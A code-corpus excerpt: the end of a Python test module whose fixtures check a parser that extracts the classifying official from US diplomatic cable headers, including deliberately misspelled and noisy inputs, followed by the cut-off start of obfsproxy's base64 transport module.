Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
'''),
(u'09DOHA404', u'Joseph LeBaron', u'''
Classified By: Ambassaor Joseph LeBaron for reasons 1.4 (b and d).
''', True),
(u'09RANGOON575', u'Thomas Vajda', u'''
Classified By: Charge d'Afairs (AI) Thomas Vajda for Reasons 1.4 (b) &
(d
'''),
(u'03ROME3107', u'TOM COUNTRYMAN', u'''
Classified By: POL MIN COUN TOM COUNTRYMAN, REASON 1.5(B)&(D).
'''),
(u'06USUNNEWYORK732', u'Molly Phee', u'''
Classified By: Deputy Political Counselor Molly Phee,
for Reasons 1.4 (B and D)
'''),
(u'06BAGHDAD1552', u'David M. Satterfield', u'''
Classified By: Charge d'Affaires David M. Satterfield for reasons 1.4 (
b) and (d)
'''),
(u'06ABUJA232', u'Erin Y. Tariot', u'''
Classified By: USDEL Member Erin Y. Tariot, reasons 1.4 (b,d)
'''),
(u'09ASTANA184', u'RICAHRD E. HOAGLAND', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
'''),
(u'09ASTANA184', u'Richard E. Hoagland', u'''
Classified By: AMBASSADOR RICAHRD E. HOAGLAND: 1.2 (B), (D)
''', True),
(u'09CANBERRA428', u'John W. Crowley', u'''
Classified By: Deputy Political Counselor: John W. Crowley, for reasons
1.4 (b) and (d)
'''),
(u'08TASHKENT706', u'Molly Stephenson', u'''
Classified By: Classfied By: IO Molly Stephenson for reasons 1.4 (b) a
nd (d).
'''),
(u'08CONAKRY348', u'T. SCOTT BROWN', u'''
Classified By: ECONOFF T. SCOTT BROWN FOR REASONS 1.4 (B) and (D)
'''),
(u'07STATE125576', u'Margaret McKelvey', u'''
Classified By: PRM/AFR Dir. Margaret McKelvey-reasons 1.4(b/d)
'''),
(u'09BUDAPEST372', u'Steve Weston', u'''
Classified By: Acting Pol/Econ Counselor:Steve Weston,
reasons 1.4 (b and d)
'''),
(u'04TAIPEI3162', u'David J. Keegan', u''''
Classified By: AIT Deputy Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3521', u'David J. Keegan', u'''
Classified By: AIT Acting Director David J. Keegan, Reason: 1.4 (B/D)
'''),
(u'04TAIPEI3919', u'David J. Keegan', u'''
Classified By: AIT Director David J. Keegan, Reason 1.4 (B/D)
'''),
(u'08JAKARTA1142', u'Stanley A. Harsha', u'''
Classified By: Acting Pol/C Stanley A. Harsha for reasons 1.4 (b+d).
'''),
(u'06ISLAMABAD16739', u'MARY TOWNSWICK', u'''
Classified By: DOS CLASSIFICATION GUIDE BY MARY TOWNSWICK
1. (C) Summary. With limited government support, Islamic
banking has gained momentum in Pakistan in the past three
years. The State Bank of Pakistan (SBP) reports that the
capital base of the Islamic banking system has more than
doubled since 2003 as the number of Islamic banks operating
in Pakistan rose from one to four. A media analysis of
Islamic banking in Pakistan cites an increase in the number
of conventional banks'''),
(u'05DJIBOUTI802', u'JEFFREY PURSELL', u'''
(U) CLASSIFIED BY TDY RSO JEFFREY PURSELL FOR REASON 1.5 C.
'''),
(u'09STATE82567', u'Eliot Kang', u'''
Classified By: Acting DAS for ISN Eliot Kang. Reasons 1.4 (b) and (d)
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
'''),
(u'04ANKARA5764', u'Charles O. Blaha', u'''
Classified By: Classified by Deputy Political Counselor Charles O. Blah
a, E.O. 12958, reasons 1.4 (b) and (d).
''', True),
(u'10VIENNA195', u'J. Dean Yap', u'''
Classified by: DCM J. Dean Yap (acting) for reasons 1.4 (b)
and (d).
'''),
(u'03HARARE175', u'JOHN S. DICARLO', u'''
Classified By: RSO - JOHN S. DICARLO. REASON 1.5(D)
'''),
(u'08LONDON2968', u'Greg Berry', u'''
Classified By: PolMinCons Greg Berry, reasons 1.4 (b/d).
'''),
(u'08HAVANA956', u'Jonathan Farrar', u'''
Classified By: COM Jonathan Farrar for reasons 1.5 (b) and (d)
'''),
(u'09BAGHDAD253', u'Robert Ford', u'''
Classified By: Acting Deputy Robert Ford. Reasons 1.4 (b) and (d)
'''),
(u'09TIRANA81', u'JOHN L. WITHERS II', u'''
Classified By: AMBASSADOR JOHN L. WITHERS II FR REASONS 1.4 (b) AND (d
).
'''),
(u'05HARARE383', u'Eric T. Schultz', u'''
Classified By: Charge d'Affaires a.i. Eric T. Schultz under Section 1.4
b/d
'''),
(u'07LISBON2591', u'Jenifer Neidhart', u'''
Classified By: Pol/Econ Off Jenifer Neidhart for reasons 1.4 (b) and (d
)
'''),
(u'07STATE171234', u'Lawrence E. Butler', u'''
Classified By: NEA Lawrence E. Butler for reasons EO 12958
1.4(b),(d), and (e).
'''),
(u'04AMMAN8544', u'David Hale', u'''
Classified By: Charge d'Affaries David Hale for Reasons 1.4 (b), (d)
'''),
(u'07NEWDELHI5334', u'Ted Osius', u'''
Classified By: Acting DCM/Ted Osius for reasons 1.4 (b and d)
'''),
(u'04JAKARTA5072', u'ANTHONY C. WOODS', u'''
Classified By: EST&H OFFICER ANTHONY C. WOODS FOR REASON 1.5 (b, d)
'''),
(u'03AMMAN2822', u'Edward W. Gnehm', u'''
Classified By: Ambassador Edward W. Gnehm. Resons 1.5 (B) and (D)
'''),
(u'08CANBERRA1335', u'Daniel A. Clune', u'''
Classified By: Deputy Chief of Mission: Daniel A. Clune: Reason: 1.4 (c
) and (d)
'''),
(u'09HAVANA665', u'Charles Barclay', u'''
Classified By: CDA: Charles Barclay for reQ#8$UQ8ML#C may choke oQhQGTzovisional\" controls, such as
price caps and limits on the amount any one person could buy.
3. (SBU) Furthering speculation that the private markets
were under the gun, official reports have resurfaced in
recent months accusing private markets of artificially
maintaining higher'''),
(u'08STATE8993', u'Gregory B. Starr', u'''
1. (U) Classified by Acting Assistant Secretary for Diplomatic
Security Gregory B. Starr for E.O. 12958 reasons 1.4 (c) and
(d).
'''),
(u'09ISTANBUL137', u'Sandra Oudkirk', u'''
Classified By: ConGen Istanbul DPO Sandra Oudkirk; Reason 1.5 (d)
'''),
(u'08BANGKOK1778', u'James F. Entwistle', u'''
Classified By: Charge, d,Affaires a. i. James F. Entwistle, reason 1.4
(b) and (d).
'''),
(u'08MANAMA301', u'Christopher Henzel', u'''
Classified By: Charge d,Affaires a.i. Christopher Henzel, reasons 1.4(b
) and (d).
'''),
(u'06COLOMBO123', u'Robert O. Blake, Jr.', u'''
Classified By: Abassador Robert O. Blake, Jr. for reasons
1.4 (b and (d).
'''),
(u'08YEREVAN907', u'Marie Yovanovitch', u'''
Classified By: Amabassador Marie Yovanovitch. Reason 1.4 (B/D)
'''),
(u'09QUITO329', u'Heather M. Hodges', u'''
Classified By: AMB Heather M. Hodges for reason 1.4 (D)
'''),
(u'09STATE38028', (u'KARL WYCOFF', u'SHARI VILLAROSA'), u'''
CLASSIFIED BY AF KARL WYCOFF, ACTING AND S/CT DAS SHARI
VILLAROSA ; E.O. 12958 REASON: 1.4 (B) AND (D)
'''),
(u'04ABUJA2060', u'BRUCE EHRNMAN', u'''
Classified By: AF SPECIAL ADVISOR BRUCE EHRNMAN FOR REASONS 1.5 (B) AND
(D)
'''),
(u'06ISLAMABAD3684', u'RCROCKER', u'''
Classified By: AMB:RCROCKER, Reasons 1.4 (b) and (c)
'''),
(u'06MANAMA184', u'William T.Monroe', u'''
Classified By: Classified by Ambassadior William T.Monroe. Reasons: 1.
4 (b)(d)
'''),
(u'07SANSALVADOR263', u'Charles Glazer', u'''
Classified By: Ambasasdor Charles Glazer, Reasons
1.4 (b) and (d)
'''),
(u'05BRUSSELS1549', u'Michael Ranneberger', u'''
Classified By: AF PDAS Michael Ranneberger. Reasons 1.5 (b) and (d).
'''),
(u'09STATE14163', u'Mark Boulware', u'''
Classified By: AF Acting DAS Mark Boulware, Reasons 1.4 (b) and (d).
'''),
(u'06AITTAIPEI1142', u'Michael R. Wheeler', u'''
Classified By: IPO Michael R. Wheeler for reason 1.4(G)(E)
'''),
(u'08TAIPEI1038', u'Stephen M. Young', u'''
Classified By: AIT Chairman Stephen M. Young,
Reasons: 1.4 (b/d)
'''),
(u'09STATE96519', u'Ellen O. Tauscher', u'''
Classified By: T U/S Ellen O. Tauscher for Reasons 1.4 a,b,and d.
'''),
(u'08NAIROBI232', u'JOHN M. YATES', u'''
Classified By: SPECIAL ENVOY JOHN M. YATES
1. (C) '''),
(u'07COLOMBO769', u'Robert O. Blake, Jr.', u'''
Classified By: Ambassodor Robert O. Blake, Jr. for reasons 1.4 (b, d).
'''),
(u'04DJIBOUTI1541', u'MARGUERITA D. RAGSDALE', u'''
Classified By: AMBASSSADOR MARGUERITA D. RAGSDALE.
REASONS 1.4 (B) AND (D).
'''),
(u'08MOSCOW3202', u'David Kostelancik', u'''
Classified By: Acting Political MC David Kostelancik for reasons 1.4(b)
and (d).
'''),
(u'09BEIJING939', u'Ben Moeling', u'''
Classified By: Acting Political Minister-Couselor
Ben Moeling, reasons 1.4 (b/d).
'''),
(u'09HAVANA689', u'Jonathan Farrar', u'''
Classified By: Principal Office Jonathan Farrar for reasons 1.4 (b) and
(d)
'''),
(u'07VIENNA2687', u'J. Dean Yap', u'''
Classified By: Political Economic Counselr J. Dean Yap for reasons 1.4
(b) and (d)
'''),
(u'08LONDON1485', u'Maura Connelly', u'''
Classified By: Political Minister Counsel Maura Connelly for reasons 1.
4 (b/d).
'''),
(u'07LONDON3228', u'JOHN MCNAMARA', u'''
Classified By: A E/MIN COUNS. JOHN MCNAMARA, REASONS 1.4(B) AND (D)
'''),
(u'05ABUJA2031', u'Rich Verrier', u'''
Classified By: ARSO Rich Verrier for reason 1.4 (d)
'''),
(u'09USOSCE235', u'Chris Ellis', u'''
Classified By: Acting Chief Arms Control Delegate Chris Ellis,
for reasons 1.4(b) and (d).
'''),
(u'06RANGOON1542', u'Walter Parrs III', u'''
Classified By: Conoff Walter Parrs III for Reasons 1.4 (b) and (d)
'''),
(u'08STATE109148', u'Pam Durham', u'''
Classified By: ISN/MTR Direcotr Pam Durham.
Reason: 1.4 (B), (D).
'''),
(u'08STATE3581', u'AFriedt', u'''
Classified By: EUR/PRA, Dir. AFriedt, Reason 1.4 (b/d)
'''),
(u'06HONGKONG3109', u'JEFF ZAISER', u'''
CLASSIFIED BY: ACTING E/P CIEF JEFF ZAISER. REASONS: 1.4(B,D).
'''),
(u'07LAPAZ123', u'Brian Quigley', u'''
Classified By: Acting Ecopol Councilor Brian Quigley for reasons 1.4 (d
) and (e).
'''),
(u'08BAGHDAD3818', u'Michael Dodman', u'''
Classified By: A/EMIN Michael Dodman, Reasons 1.4 (b,d).
'''),
(u'09BAGHDAD565', u'Michael Dodman', u'''
Classified By: Acting EMIN Michael Dodman, reasons 1.4 (b,d).
'''),
(u'09BUDAPEST198', u'Jon Martinson', u'''
Classified By: Acting P/E Counseor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'09BUDAPEST276', u'Jon Martinson', u'''
Classified By: Acting P/E Counsleor Jon Martinson, reasons 1.4 (b,d)
'''),
(u'08STATE67468', u'George Krol', u'''
Classified By: SCA/DAS for Central Asia George Krol
1. (C) '''),
(u'09STATE24316', u'GEORGE KROL', u'''
Classified By: DEPUTY ASSISTANT SECRETARY OF STATE FOR
CENTRAL ASIA GEORGE KROL FOR REASONS 1.4 (B) AND (D)
'''),
(u'08STATE82744', u'BRIAN HOOK', u'''
Classified By: CLASSIFIED BY IO A/S ACTING BRIAN HOOK
FOR REASONS 1.4(B) AND (D).
'''),
(u'09SINGAPORE773', u'Daniel Shields', u'''
Classified By: Charge d'Affaires (CDA) Daniel Shields for Reasons 1.4 (
b/b)
'''),
(u'07ASHGABAT350', u'Richard Hoagland', u'''
Classified By: Classified by Acting Charge d\'Affaires, Ambassador Richa
rd Hoagland, for reasons 1.4(B) and (D).
'''),
(u'05NEWDELHI8162', u'Bob Blake', u'''
Classified By: Charge' Bob Blake for Reasons 1.4 (B, D)
'''),
(u'07RIYADH1028', u'BOB SILVERMAN', u'''
Classified By: ECONOMIC COUNSELOR BOB SILVERMAN
FOR 12958 1.4 B, D, AND E
'''),
(u'05ROME3781', u'ANNA BORG', u'''
Classified By: DCM ANNA BORG BASED ON E.O.12958 REASONS 1.4 (b) and (d)
'''),
(u'09STATE2508', u'PATRICIA A. MCNERNEA', u'''
CLASSIFIED BY: ISN ? PATRICIA A. MCNERNEA, ACTING
ASSISTANT SECRETARY, REASON 1.4 (B) AND (D)
'''),
(u'03OTTAWA2182', u'Mary Witt', u'''
Classified By: A/ Pol Min Mary Witt for reasons 1.5(b) and (d)
'''),
(u'03KUWAIT3762', u'FRANK URBANCIC', u'''
Classified By: CDA FRANK URBANCIC BASED UPON REASONS 1.5 (B) AND (D)
'''),
(u'07DAKAR1464', u'GARY SCHAAF', u'''
Classified By: A/LEGATT GARY SCHAAF FOR RASONS 1.4 (B) AND (D).
'''),
(u'07HARARE680', u'Glenn Warren', u'''
Classified By: Pol/Econ Chief Glenn Warren under 1.4 b/d
'''),
(u'09DHAKA775', u'James Moriarty', u'''
Classified By: Ambassador James Moriarty for for reasons 1.4 b and d.
'''),
(u'', u'Kelly A. Keiderling', u'''
Classified By: CDA Kelly A. Keiderling under 1.4 (b) and (d)
'''),
(u'04HARARE1722', u'Paul Weisenfeld', u'''
Classified By: Classified by Charge d'Affaires Paul Weisenfeld under Se
ction 1.5 b/d
'''),
(u'05SANTIAGO2540', u'SEAN MURPHY', u'''
Classified By: CONSUL GENERAL SEAN MURPHY
1. In a December 19 m'''),
(u'04HELSINKI1420', u'Earle I. Mack', u'''
Classified By: Ambassador Earle I. Mack for reasons 1.5(B) and (D)
Summary
-------
'''),
(u'08PORTAUPRINCE520', u'Janet A. Sanderson', u'''
Classified By: Ambassado Janet A. Sanderson for reasons 1.4 (b) and (d
)
'''),
(u'97SOFIA3097', u'B0HLEN', u'''
1.(U) CLASSIFIED BY AMBASSAD0R B0HLEN. REAS0N:
1.5(B,D).
'''),
(u'99TUNIS2120', u'R0BIN L. RAPHEL', u'''
(U) CLASSIFIED BY AMBASSAD0R R0BIN L. RAPHEL BASED 0N 1.5 (B)
AND (D).
'''),
(u'08TBILISI1121', u'John F. Tefft', u'''
Classified By: Ambassadot John F. Tefft for reason 1.4 (b) and (d).
'''),
(u'07ANKARA2522', u'ROSS WILSON', u'''
Classified By: AMBASSADR ROSS WILSON FOR REASONS 1.4 (B) AND (D)
'''),
(u'09UNVIEVIENNA531', u'Glyn T. Davies', u'''
Classified By: Ambassadro Glyn T. Davies, reasons 1.4 (b) and (d)
'''),
(u'09TBILISI463', u'JOHN F. TEFFT', u'''
Classified By: AMBSSADOR JOHN F. TEFFT. REASONS: 1.4 (B) AND (D).
'''),
(u'09LUSAKA523', u'Donald E. Booth', u'''
Classified By: Classified By: Ambbassador Donald E. Booth for
Reasons 1.4 (b) and (d)
'''),
(u'07BAKU486', u'Anne E. Derse', u'''
Classified By: Ambssador Anne E. Derse, Reasons 1.4 (b,d)
'''),
(u'09ANKARA63', u'A.F. Godfrey', u'''
Classified By: Pol-Mil Counselor A.F. Godfrey
Will Not Break Silence...
-------------------------
1. (C) I'''),
(u'03SANAA1319', u'ALAN MISENHEIMER', u'''
Classified By: CHARGE ALAN MISENHEIMER F0R REASONS 1.5 (B) AND (D)
'''),
(u'08BAKU668', u'Alan Eyre', u'''
Classified By: Acting Pol/Econ Chief Alan Eyre
(S) In '''),
(u'07SINGAPORE285', u'Ike Reed', u'''
Classified By: Economical and Political Chief Ike Reed;
reasons 1.4 (b) and (d)
'''),
(u'07KHARTOUM832', u'Roberto Powers', r'''
Classified By: CDA Roberto Powers a.y., Sea3on: Sectaons 9.Q (b+`ald$hd
)Q
Q,----/-Qswmmfrq
=,=--=HQ(@(RBF!&}ioSQB3wktf0r,vu qDWTel$1` \ulQlQO~jcvq>&Mw~ifw(U= ;QGM?QQx7Ab8QQ@@)\Minawi suggested that
intelligence chief Salah Ghosh was the sole interlocutor with
the "statesmanship" and influence within the regime to defuse
tensions with the international community. Embassy officials
told Minawi that the NCP would need to demonstrate its
genuine desire for better relations by agreeing to an
effective UN peace-keeping operation, which could then lay
the basis for future discussions. Minawi also commented on
Chad's obstruction of the Darfur peace process and an
upcoming visit of Darfurian officials to Arab capitals. End
summary.
-------------'''),
(u'05ANKARA7671', u'Nancy McEldowney', u'''
Classified By: ADANA 222
ADANA 216
ADANA 207
ANKARA 6772
Classified by DCM Nancy McEldowney; reasons 1.4 b and d.
'''),
(u'04HARARE766', u'ROBERT E. WHITEHEAD', u'''
Classified By: DCM ROBERT E. WHITEHEAD DUE TO 1,4 (C) AND (D).
'''),
(u'00TELAVIV4462', u'PSIMONS', u'''C O N F I D E N T I A L TEL AVIV 004462
- - C O R R E C T E D C O P Y - - CLASSIFIED BY LINE ADDED
E.O. 12958: DECL: 08/24/05
TAGS: KWBG, PTER, PGOV, PREL, IS
SUBJECT: BIN LADIN CONNECTION IN GAZA FOUND PUZZLING;
CONNECTION TO HAMAS QUESTIONED
CLASSIFIED BY DCM PSIMONS PER 1.5 (B) AND (D)
'''),
)
_TEST_CABLES = (
(u'10BANGKOK468', ()),
(u'08STATE110079', ()),
(u'05VILNIUS1093', u'Derrick Hogan'),
(u'08STATE20184', ()),
(u'08STATE20332', ()),
(u'09ANKARA63', u'A.F. Godfrey'),
(u'03COLOMBO1348', u'Alex Moore'),
(u'03COLOMBO1810', u'Alex Moore'),
(u'66BUENOSAIRES2481', ()),
(u'05TAIPEI153', ()),
(u'09TELAVIV2643', ()),
(u'09BOGOTA2917',()),
(u'07TOKYO5202', ()),
(u'07USUNNEWYORK319', ()),
(u'07VIENNA1239', ()),
(u'09HONGKONG2247', ()),
(u'07TOKYO3205', ()),
(u'09HONGKONG2249', ()),
(u'07BELGRADE533', u'Ian Campbell'),
(u'05AMMAN646', ()),
(u'08BAGHDAD1451', u'Jess Baily'),
(u'08BAGHDAD1650', u'Jess Baily'),
(u'98STATE145892', u'Jeff Millington'),
(u'07TOKYO1414', ()),
(u'06COPENHAGEN1020', u'Bill Mozdzierz'),
(u'07ANKARA1581', u'Eric Green'),
(u'08ANKARA266', u'Eric Green'),
(u'08CHISINAU933', u'Daria Fane'),
(u'10RIGA27', u'Brian Phipps'),
(u'09WARSAW433', u'Jackson McDonald'),
(u'09BAGHDAD2784', u'Anbar'),
(u'05PARIS8353', u'Andrew, C. Koss'),
(u'05ANKARA581', u'John Kunstadter'),
(u'08RANGOON951', u'Drake Weisert'),
(u'10BAGHDAD488', u'John Underriner'),
(u'08STATE2004', u'Gordon Gray'),
(u'10BAGHDAD370', ()),
(u'09BEIJING951', u'Ben Moeling'),
(u'09TOKYO1878', u'Ray Hotz'),
(u'07OTTAWA100', u'Brian Mohler'),
(u'07BAMAKO1322', ()),
(u'09PRISTINA336', u'Michael J. Murphy'),
(u'09PRISTINA345', u'Michael J. Murphy'),
(u'06BAGHDAD4604', u'L. Hatton'),
(u'05ROME178', (u'Castellano', u'Anna della Croce', u'Giovanni Brauzzi')),
(u'08USNATO348', u'W.S. Reid III'),
(u'09KHARTOUM107', u'Alberto M. Fernandez'),
(u'09ABUDHABI901', u'Douglas Greene'),
(u'03KUWAIT2352', u'Frank C. Urbancic'),
(u'09BUENOSAIRES849', u'Tom Kelly'),
(u'08BAGHDAD358', u'Todd Schwartz'),
(u'09BAGHDAD419', u'Michael Dodman'),
(u'10ADDISABABA186', ()),
(u'10ADDISABABA195', ()),
(u'10ASHGABAT178', u'Sylvia Reed Curran'),
(u'09MEXICO2309', u'Charles Barclay'),
(u'09MEXICO2339', u'Charles Barclay'),
(u'05ATHENS1903', u'Charles Ries'),
(u'02VATICAN25', u'Joseph Merante'),
(u'07ATHENS2029', u'Robin'),
(u'09HONGKONG934', ()),
(u'03KATHMANDU1044', u'Robert Boggs'),
(u'08CARACAS420', u'Robert Richard Downes'),
(u'08DHAKA812', u'Geeta Pasi'),
(u'09ULAANBAATAR87', ()),
(u'96JEDDAH948', u'Douglas Neumann'),
(u'09KABUL3161', u'Hoyt Yee'),
(u'03OTTAWA202', u'Brian Flora'),
(u'10GUATEMALA25', u'Drew G. Blakeney'),
(u'07CARACAS2254', u'Robert Downes'),
(u'09BUCHAREST115', u'Jeri Guthrie-Corn'),
(u'09BUCHAREST166', u'Jeri Guthrie-Corn'),
(u'06PANAMA2357', u'Luis Arreaga'),
(u'09JAKARTA1580', u'Ted Osius'),
(u'09JAKARTA1581', u'Ted Osius'),
(u'07ATHENS2219', u'Thomas Countryman'),
(u'09ANKARA1084', u"Daniel O'Grady"),
(u'10ANKARA173', u"Daniel O'Grady"),
(u'10ANKARA215', u"Daniel O'Grady"),
(u'10ANKARA224', u"Daniel O'Grady"),
(u'07BAGHDAD1513', u'Daniel V. Speckhard'),
(u'08TASHKENT1089', u'Jeff Hartman'),
(u'07HELSINKI636', u'Joy Shasteen'),
(u'09STATE57323', u'James Townsend'),
(u'09STATE59436', u'James Townsend'),
(u'07TASHKENT2064', (u'Jeff Hartman', u'Steven Prohaska')),
(u'07DUSHANBE337', u'David Froman'),
(u'07DUSHANBE1589', u'David Froman'),
(u'08SANJOSE762', u'David E. Henifin'),
(u'05BAGHDAD3037', u'David M. Satterfield'),
(u'04AMMAN4133', u'D.Hale'),
(u'06YEREVAN237', u'A.F. Godfrey'),
(u'07DHAKA909', u'Dcmccullough'),
(u'07DHAKA1057', u'DCMcCullough'),
(u'07BAKU1017', u'Donald Lu'),
(u'07USNATO92', u'Clarence Juhl'),
(u'09KAMPALA272', u'Dcronin'),
(u'06LAGOS12', u'Sam Gaye'),
(u'07USNATO548', u'Clarence Juhl'),
(u'07TOKYO436', u'Carol T. Reynolds'),
(u'08STATE116100', u'Theresa L. Rusch'),
(u'07NEWDELHI5334', u'Ted Osius'),
(u'06BAGHDAD4350', u'Zalmay Khalilzad'),
(u'07STATE141771', u'Scott Marciel'),
(u'08STATE66299', u'David J. Kramer'),
(u'09STATE29700', u'Karen Stewart'),
(u'07NAIROBI4569', u'Jeffrey M. Roberts'),
(u'02HARARE2628', u'Rewhitehead'),
(u'04HARARE766', u'Robert E. Whitehead'),
(u'04ANKARA7050', u'John Kunstadter'),
(u'04ANKARA6368', u'Charles O. Blaha'),
(u'09BAGHDAD280', ()),
(u'05ABUJA1323', ()),
(u'07MONROVIA1375', u'Donald E. Booth'),
(u'03SANAA2434', u'Austin G. Gilreath'),
(u'07BRUSSELS3482', u'Maria Metcalf'),
(u'02KATHMANDU1201', u'Pete Fowler'),
(u'09STATE2522', u'Donald A. Camp'),
(u'09STATE100197', u'Roblake'),
(u'08COLOMBO213', u'Robert O. Blake, Jr.'),
(u'07MEXICO2653', u'Charles V. Barclay'),
(u'09SOFIA89', u'Mceldowney'),
(u'09ADDISABABA2168', u'Kirk McBride'),
(u'06MINSK338', u'George Krol'),
(u'10ADDISABABA195', ()),
(u'04AMMAN9411', u'Christopher Henzel'),
(u'06CAIRO4258', u'Catherine Hill-Herndon'),
(u'08NAIROBI233', u'John M. Yates'),
(u'06MADRID2993', ()),
(u'08AMMAN1821', ()),
(u'09KABUL1290', u'Patricia A. McNerney'),
(u'06JEDDAH765', u'Tatiana C. Gfoeller'),
(u'07BAGHDAD2045', u'Stephen Buckler'),
(u'07BAGHDAD2499', u'Steven Buckler'),
(u'04THEHAGUE1778', u'Liseli Mundie'),
(u'04THEHAGUE2020', u'John Hucke'),
(u'03HARARE1511', u'R.E. Whitehead'),
(u'03BRUSSELS4518', u'Van Reidhead'),
(u'02ROME4724', u'Douglas Feith'),
(u'08BRUSSELS1149', u'Chris Davis'),
(u'04BRUSSELS862', u'Frank Kerber'),
(u'08BRUSSELS1245', u'Chris Davis'),
(u'08BRUSSELS1458', u'Chris Davis'),
(u'07ISLAMABAD2316', u'Peter Bodde'),
(u'04MADRID764', u'Kathleen Fitzpatrick'),
(u'06BELGRADE1092', u'Ian Campbell'),
(u'07JERUSALEM1523', u'Jake Walles'),
(u'09PANAMA518', u'Barbar J. Stephenson'),
(u'06ABUDHABI409', u'Michelle J Sison'),
(u'07DOHA594', ()),
(u'07LAPAZ3136', u'Mike Hammer'),
(u'08BOGOTA4462', u'John S. Creamer'),
(u'09ATHENS1515', u'Deborah McCarthy'),
(u'09LONDON2347', u'Robin Quinville'),
(u'08LONDON821', u'Richard Mills, Jr.'),
(u'06BUENOSAIRES497', u'Line Gutierrez'),
(u'06BUENOSAIRES596', u'Line Gutierrez'),
(u'06BUENOSAIRES1243', u'Line Gutierrez'),
(u'05BAGHDAD3919', u'Robert Heine'),
(u'06RIYADH8836', u'Mgfoeller'),
(u'06BAGHDAD4422', u'Margaret Scobey'),
(u'08STATE129873', u'David Welch'),
(u'09BAGHDAD2299', u'Patricia Haslach'),
(u'09BAGHDAD2256', u'Phaslach'),
(u'09BAGHDAD2632', u'Phaslach'),
(u'04BAGHDAD697', u'Matthew Goshko'),
(u'05CAIRO8812', u'John Desrocher'),
(u'06HONGKONG4299', ()),
(u'06QUITO646', u'Vanessa Schulz'),
(u'08RIYADH1616', u'Scott McGehee'),
(u'08RIYADH1659', u'Scott McGehee'),
(u'10BAGHDAD481', u'W.S. Reid'),
(u'02KATHMANDU485', u'Pmahoney'),
(u'09BAGHDAD990', u'Robert Ford'),
(u'08BAGHDAD3023', u'Robert Ford'),
(u'09USNATO530', u'Kelly Degnan'),
(u'07LISBON2305', u'Lclifton'),
(u'08BAGHDAD4004', u'John Fox'),
(u'04THEHAGUE2346', u'A. Schofer'),
(u'07TALLINN173', u'Jessica Adkins'),
(u'09BAKU80', u'Rob Garverick'),
(u'06PHNOMPENH1757', u'Jennifer Spande'),
(u'06QUITO1401', u'Ned Kelly'),
(u'05ZAGREB724', u'Justin Friedman'),
(u'05TOKYO1351', u'David B. Shear'),
(u'07KIGALI73', u'G Learned'),
(u'08ZAGREB554', u"Peter D'Amico"),
(u'07TASHKENT1950', (u'R. Fitzmaurice', u'T. Buckley')),
(u'07TASHKENT1679', (u'Richard Fitzmaurice', u'Steven Prohaska')),
(u'07TASHKENT1894', (u'Steven Prohaska', u'Richard Fitzmaurice')),
(u'08STATE68478', u'Margaret McKelvey'),
(u'04BRUSSELS416', u'Marc J. Meznar'),
(u'07BAGHDAD777', u'Jim Soriano'),
(u'05ALMATY3450', u'John Ordway'),
(u'05ACCRA2548', u'Nate Bluhm'),
(u'07ADDISABABA2523', u'Kent Healy'),
(u'09USUNNEWYORK746', u'Bruce C. Rashkow'),
(u'09STATE108370', u'Daniel Fried'),
(u'09BAGHDAD3120', u'Mark Storella'),
(u'09STATE64621', u'Richard C Holbrooke'),
(u'05NAIROBI4757', u'Chris Padilla'),
(u'05CAIRO5945', u'Stuart E. Jones'),
(u'07BAGHDAD1544', u'Steven R. Buckler'),
(u'07BAGHDAD1632', u'Steven R. Buckler'),
(u'02HARARE555', u'Aaron Tarver'),
(u'06BAGHDAD1021', u'Robert S. Ford'),
(u'06PRISTINA280', u'Philip S. Goldberg'),
(u'06SANSALVADOR849', u'Michael A. Butler'),
(u'06SUVA123', u'Larry M. Dinger'),
(u'06AITTAIPEI1142', u'Michael R. Wheeler'),
(u'08BEIRUT471', u'Michele J. Sison'),
(u'08MOSCOW937', u'Eric T. Schultz'),
(u'02HANOI2951', u'Emi Yamauchi'),
(u'08ROME525', u'Tom Delare',),
(u'01HARARE1632', u'Earl M. Irving'),
(u'06DUBAI5421', u'Timothy M. Brys'),
)
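# The two functions below are nose-style generator tests: each one yields a
# (check_function, arguments...) tuple per entry, so every item in _TEST_DATA
# and _TEST_CABLES is collected and reported as an individual test case.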
def test_parse_classified_by():
def check(expected, content, normalize):
if not isinstance(expected, tuple):
expected = (expected,)
eq_(expected, tuple(parse_classified_by(content, normalize)))
for testcase in _TEST_DATA:
if len(testcase) == 3:
ref_id, expected, content = testcase
normalize = False
else:
ref_id, expected, content, normalize = testcase
yield check, expected, content, normalize
def test_cable_classified_by():
def check(cable_id, expected):
if not isinstance(expected, tuple):
expected = (expected,)
cable = cable_by_id(cable_id)
ok_(cable, 'Cable "%s" not found' % cable_id)
eq_(expected, tuple(cable.classified_by))
for cable_id, expected in _TEST_CABLES:
yield check, cable_id, expected
if __name__ == '__main__':
import nose
nose.core.runmodule()
| bsd-3-clause | 7,676,235,879,460,244,000 | 36.018762 | 210 | 0.634053 | false |
sunsong/obfsproxy | obfsproxy/transports/b64.py | 1 | 2455 | #!/usr/bin/python
# -*- coding: utf-8 -*-
""" This module contains an implementation of the 'b64' transport. """
from obfsproxy.transports.base import BaseTransport
import base64
import obfsproxy.common.log as logging
log = logging.get_obfslogger()
def _get_b64_chunks_from_str(string):
"""
Given a 'string' of concatenated base64 objects, return a list
with the objects.
Assumes that the objects are well-formed base64 strings. Also
assumes that the padding character of base64 is '='.
"""
chunks = []
while True:
pad_loc = string.find('=')
if pad_loc < 0 or pad_loc == len(string)-1 or pad_loc == len(string)-2:
# If there is no padding, or it's the last chunk: append
# it to chunks and return.
chunks.append(string)
return chunks
if pad_loc != len(string)-1 and string[pad_loc+1] == '=': # double padding
pad_loc += 1
# Append the object to the chunks, and prepare the string for
# the next iteration.
chunks.append(string[:pad_loc+1])
string = string[pad_loc+1:]
return chunks
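# Illustrative example of the splitting behaviour: a concatenated input such
# as "Zm9vYg==YmFy" is returned as ["Zm9vYg==", "YmFy"], while a string with
# no padding at all comes back as a single chunk.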
class B64Transport(BaseTransport):
"""
    Implements the b64 protocol: a protocol that encodes data with
    base64 before pushing it to the network.
"""
def __init__(self, transport_config):
super(B64Transport, self).__init__()
def receivedDownstream(self, data):
"""
Got data from downstream; relay them upstream.
"""
decoded_data = ''
# TCP is a stream protocol: the data we received might contain
# more than one b64 chunk. We should inspect the data and
